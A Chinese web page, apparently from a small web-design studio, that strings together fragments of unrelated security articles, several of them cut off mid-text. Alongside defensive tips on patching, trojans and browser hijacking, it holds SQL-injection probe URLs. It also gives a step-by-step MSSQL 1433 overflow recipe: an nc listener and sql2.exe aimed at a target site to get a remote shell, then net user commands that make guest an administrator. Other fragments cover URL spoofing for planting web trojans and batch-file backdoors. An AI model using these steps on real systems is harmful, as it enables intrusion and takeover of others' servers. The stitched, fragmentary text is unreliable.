力中网络（西安网站制作工作室）

入侵你网站的有2种人：高手、菜鸟！所以他们所使用的方法，手段都不相同！这些你可以通过网站日志获取。不信你看看，菜鸟的日志记录全部是用工具扫描，扫不出来就放弃。高手就不一样了，他们自己会构造各种语句进行攻击！

先来讲预防：

反击菜鸟的方法：更改你的404，400，500错误页面;更改后台管理路径;查下自己密码的MD5是否被那些破解密码的网站收录;把所有已知补丁都打完整;更改默认数据库路径及文件名;

反击高手的方法：每天一定要都去官方看看有没有啥最新的补丁，高手一般只玩0day。

1、加密数据的安全性受制于解密密钥的安全性。
2、如果攻击者能够说服您在自己的计算机上运行他的程序，那么该计算机便不再是您的了。
3、如果攻击者能够再您的计算机上更改操作系统，那么该计算机不再属于您。
4、技术不是万能药。
5、如果您允许攻击这上载程序到您的WEB站点，那么该站点就不再属于您了。
6、绝对的匿名无论是现实中还是在WEB中都不切实际。
7、如果攻击者能够不受限制地访问你地计算机，那么该计算机便不再属于您了。
...

    目前网络上最猖獗的病毒估计非木马程序莫数了，2005年木马程序的攻击性也有了很大的加强，在进程隐藏方面，做了较大的改动，不再采用独立的EXE可执行文件形式，而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等，这些木马也是目前最难对付的。本期就教你查找和清除线程插入式木马。

    一、通过自动运行机制查木马

    一说到查找木马，许多人马上就会想到通过木马的启动项来寻找“蛛丝马迹”，具体的地方一般有以下几处:

    编者按：浏览器劫持，一个很热门的话题。要想让自己的浏览器别在被劫持了，那先让我们了解一下，浏览器是如何被劫持的吧！

    一、我的浏览器怎么了？

    今天是大年初二，王先生家中来了许多客人，把平时埋头于工作的王先生弄了个手忙脚乱，由于客人带来的几个小孩子嚷嚷着要出去上网，王先生只好把寝室里的电脑让给了这一群孩子玩，好容易到了晚上，客人散尽，王先生想在休息前上网浏览一下新闻，可是当他打开IE的时候，却发现它自动连接到一个莫名其妙的网站去了，而且收藏夹里也多了一些奇怪的网址，王先生担心是系统感染了病毒，赶紧输入一个在线杀毒工具的网址，结果IE打开的却是另一个不知所谓的网站。看着IE地址栏里准确无误的杀毒工具网址和下面那根本扯不上关系的内容，王先生真的手忙脚乱了……

检测可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常页面)

http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

检测表段的

http://127.0.0.1/xx?id=11 and exists (select * from admin)

    本文通过七步设置介绍了针对Windows 2000和Windows XP操作系统如何防范非法用户入侵的“七招”。

    第一招：屏幕保护

    在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的安全。

    第一：1433的溢出攻击。在win2000机器上装了mssql的话，机器就会开1433端口。什么是端口，就像食堂买菜的窗口一样，你买白菜上1号窗，买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe。进攻方法就两步：第一步，在自己机器上开一个cmd窗口。对了，你要用win2000的话，就开始－运行－写入cmd回车。这里我们只用2000，不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话，就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步：再在开始－运行－写入cmd回车，再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明：如何得到入侵网站ip?在cmd下c:>pingwww.xxxxx.com就可以看到了。自己的ip呢？在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的，但好像40和53成功率高一点。再是命令中的0不行的话，你就试试1或2。如果入侵网站有这个漏洞话，那么你开的第一个窗口就会变成肉鸡的c:\\winnt\\system32>.就是说，你已经进入它的机器里了。进去以后，你可以填加个用户了。net user guest /active:yes用这个命令，就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

网页木马种植方案一直都存在很大的问题，当然欺骗需要技巧也需要时间，我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新浏览器漏洞实现域名的欺骗.....
前言
域名欺骗有多种实现方法，本文所说的是利用客户端浏览器的漏洞来欺骗用户。
多数浏览器都会存在这个漏洞，目前暂时还没相应的补丁。漏洞是这样的：
当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的，那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url：
...

在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建
立；
2）服务器产生一个随机的64位数（实现挑战）传送回客户；
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结
...

    IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。

    原理:现在彩票非常火爆，一个人花两块钱买了一张彩票，可能会中500万，但是这个几率是很低很低的;你登陆一个系统，系统问你要密码，你随便写了一个，居然蒙对了，这个概率就和买2块钱中500万的概率是一样的。但是如果这个人花2000万买了1000万张不同号码的彩票，那么他中大奖的几率是多少呢?就很高很高了，当然在买彩票的领域没有人会这么做，但是在网络上就有可能了，我测试一个口令很难猜对，但是我连续测试1万个，10万个，甚至100万个口令，那么猜对的几率是不是就大增了呢?当然这时候需要的就不是人手工猜测了，而是程序的自动测试。这种海量连续测试口令的方法，通常就称为暴力破解法，名字也很贴切，我不聪明，但是我有暴力(就是强大的计算机资源)，所以我要破解你。 其实即便是一个暴力破解法，对一些有一定复杂度的密码也是素手无策的，尽管电脑运算速度很快，但是并不足以快到可以用有限短的时间处理巨多亿次的测试运算，为什么这么说?举个例子，假设密码只有8位，每位可能是26个字母(分大小写就是52种)，加上10个数，在加上一些特殊字符(如@#$%^等等，假设只有10个，其实不止)，也就是每位上的可能性就有52+10+10=72，8位遍历就是72的8次方， 也就是大约600万亿!!!所有，这样去破解密码，通常是不可能的，那么这就是所谓字典档和密码规则设定来减少这种遍历。

我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据，用户认为该页面是可信赖的，但是当浏览器下载该页面，嵌入其中的脚本将被解释执行，有时候跨站脚本被称为"XSS"，这是因为"CSS"一般被称为分层样式表，这很容易让人困惑，如果你听某人提到CSS或者XSS安全漏洞，通常指得是跨站脚本。

XSS和脚本注射的区别？

原文里作者是和他一个朋友(b0iler)讨论后，才明白并非任何可利用脚本插入实现攻击的漏洞都被称为XSS，还有另一种攻击方式："Script Injection",他们的区别在以下两点：
...

如果没有一定的相关知识恐怕不容易看懂和理解批处理文件，也就更谈不上自己动手编写了

批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件（也被称为批处理程序或脚本），可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用，例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。

    网络上曾经有过关于跨站脚本攻击与防御的文章，但是随着攻击技术的进步，以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了，而且由于这种对于跨站脚本认识上的混乱，导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题，希望本文能给写程序的与研究程序的带来一点思路。 
还是首先看看跨站脚本漏洞的成因，所谓跨站脚本漏洞其实就是Html的注入问题，恶意用户的输入没有经过严格的控制进入了数据库最终显示给来访的用户，导致可以在来访用户的浏览器里以浏览用户的身份执行HTml代码，数据流程如下： 

    正如我们大家所知道的那样，互联网的无处不在已经完全改变了我们所知道的网络。过去完全孤立的网络现在连接到了全世界。这种无处不在的连接使企业能够完成过去不可想象的任务。然而，与此同时还存在一个黑暗面。互联网变成了网络犯罪分子的天堂。这些网络犯罪分子利用这种连接向企业发起了数量空前的多的攻击。当互联网最初开始流行的时候，企业开始认识到它们应该使用防火墙防止对它们实施的攻击。防火墙通过封锁没有使用的TCP和UDP端口发挥作用。虽然防火墙在封锁某些端口的攻击是有效的，但是，有些端口对于HTTP、SMTP和POP3通信是有用的。为了保证这些服务工作正常，对这些常用的服务的对应的端口必须要保持开放的状态。问题是，黑客已经学会了如何让恶意通信通过这些通常开放的端口。
...